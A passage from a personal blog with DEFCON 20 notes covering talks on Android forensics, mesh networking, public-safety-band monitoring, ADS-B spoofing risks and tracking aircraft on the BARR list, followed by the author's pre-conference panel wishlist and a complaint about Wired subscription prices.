- There’s a specific distribution, Santoku Linux, designed for mobile device forensics (both IOS and Android). This is a work in progress, per the presenter…
(While I’m at it, let me say that I’m really impressed with viaForensics, especially their presentation page. Not only did they have the DEFCON presentation up, but it looks like there’s a lot of other good stuff there as well. I’m particularly interested in “iPhone Forensics with free and/or open source tools” and the “Android Forensics Training Presentation“.)
“Off Grid Communications with Android – Meshing the Mobile World”: Solid presentation discussing the Android networking stack, hacking the stack and flipping chipsets into ad-hoc mode, and network routing algorithms. End result: the SPAN project on github, which provides open-source tools for Android mesh networks. (There’s also a paper in that repository that covers the same ground as the presentation, including sexy diagrams of the Android network stack.)
“The Safety Dance – Wardriving the Public Safety Band”:Basically: public safety providers are moving into the 4.9 GHz band. And it is possible to monitor their traffic using equipment bought for cheap off eBay, or equipment that, with the right drivers, can be tuned down to 4.9 GHz. One of the presenters has a blog entry here that covers some of what was in the presentation, and the github repository of their patched drivers, etc. can be found here.
I missed Kaminsky’s “Black Ops” presentation for reasons of the Penn and Teller theater being full, and I can’t find it online (yet). So I wandered over to Renderman’s “Hacker + Airplanes = No Good Can Come Of This” and got there a little late; late enough, as it turned out, that I missed Renderman observing that he was constantly being scheduled on panels opposite Kaminsky, and darn it, he’d really like to see a Kaminsky panel.
But I digress.
So have you ever wondered how things like PlaneFinder work? As part of the government’s efforts to bring air traffic control into the 20th Century, they’ve implemented something called ADS-B. Planes equipped with ADS-B transmitters send out data (such as their aircraft ID, altitude, GPS coordinates, bearing, and speed), which is picked up by ground stations and fed into the systems that feed PlaneFinder and other such sites. There’s two types: ADS-B Out, which is sent automatically as a broadcast, and ADS-B In, which allows planes to listen to each others ADS-B Out broadcasts, so that (in theory) they’re aware of each other without needing air traffic control.
(According to the presentation that followed Renderman, ADS-B is at about 70% penetration for commercial aircraft, and much lower for general aviation. The government’s goal is to have the majority of traffic on the system by 2020.)
When does this get interesting? Right about now. First of all, anyone can build a ground station and receive ADS-B broadcasts. Renderman has. (I understand there’s been quite a bit of work on using cheap-ass USB digital TV tuners as ADS-B receivers.) That gets you access to the flight data going over your head.
But wait, there’s more! ADS-B has no authentication and no encryption built in. That means anyone with the proper equipment (a radio that transmits at 1090 MHz) can spoof ADS-B broadcasts.
Remember the part above about how planes could use ADS-B to keep track of each others positions, bypassing ATC? Have you booked your Amtrak ticket yet?
As ADS-B usage grows, attacks are likely to become more disruptive. What happens if someone starts jamming ADS-B signals? Or inserting fake flight data? Or has the same fake plane in two places at once? The official response, according to Renderman, boils down to “trust us”. “Us” being the same folks who brought you Operation Fast and Furious. Pull the other one, guys; it has bells on.
Edited to add: Link to Renderman’s slides for this presentation added 8/1/2012.
“Busting the BARR: Tracking ‘Untrackable’ Private Aircraft for Fun & Profit”: A semi-related panel to Renderman’s. So how does PlaneFinder get the data that comes from ADS-B broadcasts? The FAA has a feed (called ASDI: Aircraft Situation Display to Industry); they’ll send you the data in XML format, and you can parse it and display it and hug it and squeeze it and call it George, if you want.
However, the FAA also has something called the “Block Aircraft Registration Request”. If you’re someone who doesn’t want their flight information made public, you can put your aircraft on the BARR list. This doesn’t strip your data out of the ASDI feed; that’s still there, but sites that use ASDI (like FlightAware) can’t display information for flights on the BARR. (If you want to subscribe to the ASDI feed, write an XML parser, and be notified every time Jay Z’s plane takes off and lands, more power to you. You just can’t share that information with others.)
So how did the presenters work around that? Their project basically comes down to:
- Monitoring LiveATC.net and downloading ATC communications.
- Using speech recognition to pull out flight information (such as tail numbers of planes).
- Profit. Or in this case, OpenBARR.net, which is still in testing.
That was enough excitement for one day. I seriously thought about entering the DEFCON Beard Competition, but I couldn’t tell if there was a cash prize and I don’t want the IOC revoking my status as an amateur.
-2 Day DEFCON 20 notes.
Monday, July 23rd, 2012The schedule for DEFCON 20 is up.
Lawrence reminded me on Saturday that I also had not solicited panel requests, so this is your pre-DEFCON 20 post.
I’m flying out Wednesday morning and getting to Las Vegas around 1 PM. I’m hoping to visit the Mob Museum (just because it is new since my last visit, and I haven’t seen it) and to make a return trip to the two bookstores I visited last year. Lotus of Siam is also required.
There is some stuff going on at DEFCON on Thursday:
- “Breaking Wireless Encryption Keys“: I’m generally familiar with the how-to of breaking WEP, and the attacks against WPA. I keep meaning to set up a lab and do some WEP attacks, but I never get around to it (always something else going on), and I’ve never actually seen it done, so this panel intrigues me.
- “Intro to Digital Forensics: Tools & Tactics“: Another possibility. My experience with forensic tools is weak.
- “HF skiddies suck, don’t be one. Learn some basic Python.“: A maybe, more for the Python angle than anything else.
Here’s what I’m interested in on Friday:
- “Making Sense of Static – New Tools for Hacking GPS“: As you know, Bob, I’m fascinated by GPS, and I’m curious to see what these guys come up with.
- “Not So Super Notes, How Well Does US Dollar Note Security Prevent Counterfeiting?“: I don’t think I’ve mentioned this before, but I have an academic fascination with counterfeiting. Then again, who isn’t attracted to the idea of making your own money?
- “How to Hack VMware vCenter Server in 60 Seconds“: I have to work with VMware from time to time in my real job, so…
- “Bypassing Endpoint Security for $20 or Less“: I like cheap.
- “Safes and Containers: Insecurity Design Excellence“: “…design issues that allow locks and safes to be opened in seconds, focusing on consumer-level containers that are specified as secure for storing valuables and weapons, and in-room hotel safes that travelers rely upon.” Enough said.
Saturday, we have a possible tie for this year’s “Hippie, PLEASE” panel:
- “Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future“: the description doesn’t sound all that obnoxious, but Richard Thieme is a multiple past–winner of the “Hippie, PLEASE” DEFCON panel award.
- And, “Beyond the War on General Purpose Computing: What’s Inside the Box?” by none other than C*ry D*ctr*w.
I shan’t be attending either. The Saturday panels I am interested in:
- Either “Creating an A1 Security Kernel in the 1980s (Using “Stone Knives and Bear Skins”)” or “Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2“: I do kind of like historical perspective panels, but I’m also really interested in the MS-CHAP attack.
- “Exploit Archaeology: Raiders of the Lost Payphones“: Payphones? PAYPHONES? Apparently, those are still a thing you can attack. (“Stamp Out Hash Corruption! Crack All The Things” does deserve a nod, though, for the Hyperbole and a Half reference.)
- “Into the Droid: Gaining Access to Android User Data“: Android hacking is still hot.
- “Off-Grid Communications with Android: Meshing the Mobile World“: I like the idea of “Smart Phone AdHoc Networks”, if for no other reason than as a fallback in case of disaster.
- “The Safety Dance – Wardriving the Public Safety Band“: I’ve kind of dropped away from it, but I used to be a scanner/shortwave geek, and this panel has me curious.
- “Black Ops” or “Hacker + Airplanes = No Good Can Come Of This“: I’m a big fan of both Dan Kaminsky and Renderman, and I really really want to see both of these panels. I’ll probably hit Kaminsky’s panel unless I can’t get in. And I do resent the fact that DEFCON scheduled these two panels against each other. (“Spy vs Spy: Spying on Mobile Device Spyware” also sounds fun, but given a choice, I’ll take Kaminsky or Renderman.)
- “Busting the BARR: Tracking “Untrackable” Private Aircraft for Fun & Profit“: This will depend on how I feel at the end of the day: I’m kind of interested, and I think a couple of my friends will be as well, but if I’m feeling wore out, I may skip it. I’m also kind of curious about “The Darknet of Things, Building Sensor Networks That Do Your Bidding“: mostly I want to see if these guys are Arduino-based, and if they are, I might hit that instead.
Sunday! Sunday! Sunday! Live at DEFCON 20! Nitro-burning FUNNY CARS!
- “SIGINT and Traffic Analysis for the Rest of Us“: I’m also a big fan of Matt Blaze. As an ex-radio geek I’m interested in SIGINT. And I’ve read the P25 paper, so this pushes several buttons at once.
- “SCADA HMI and Microsoft Bob: Modern Authentication Flaws With a 90’s Flavor“: SCADA: hot. Plus gratuitous Microsoft Bob reference.
- “Owning the Network: Adventures in Router Rootkits“. Seems like the best thing going on in that slot at that time.
- “Hacking [Redacted] Routers“: See above.
- “SQL Injection to MIPS Overflows: Rooting SOHO Routers“: See previous two entries. At this point, I may be routered-out, so I reserve the right to skip this one.
- “Hacking the Google TV“: This might be my only chance to see someone hack what, so far, has been a total failure.
- Pretty much have to go to the closing ceremonies.
So that’s that. If anyone has any specific panel requests after looking over the posted schedule, let me know (by email on in the comments), and I’ll try to hit those events. Also, if anyone has any recommendations for new, cool, or interesting places to eat in Vegas, feel free to leave those in comments.
(Edited to add: It’s a Borepatch-o-lanche! Thank you, brother man!)
Noted.
Thursday, May 17th, 2012I can get Wired for a buck an issue if I use the blow-in cards that come with the print edition. (I can also frequently get Wired for a buck an issue if I purchase it at Half-Price Books.)
If I go to their website to subscribe, the combined print/tablet issue costs $1.67 an issue. The tablet or print issues by themselves cost $1.25 an issue.
If I get the Wired app
(Current print subscribers apparently get the content for free. Which means that it makes more sense to go to Wired‘s web site and subscribe than it does to do an in-app purchase: $15 vs. $19.99. It makes even more sense to subscribe using the cards, but then I have to deal with the print editions.)
Look, Conde Nasties, I’d be happy to subscribe to the Kindle edition of Wired. But I want at least as good a deal as you give on those blow-in cards. One dollar an issue or bust!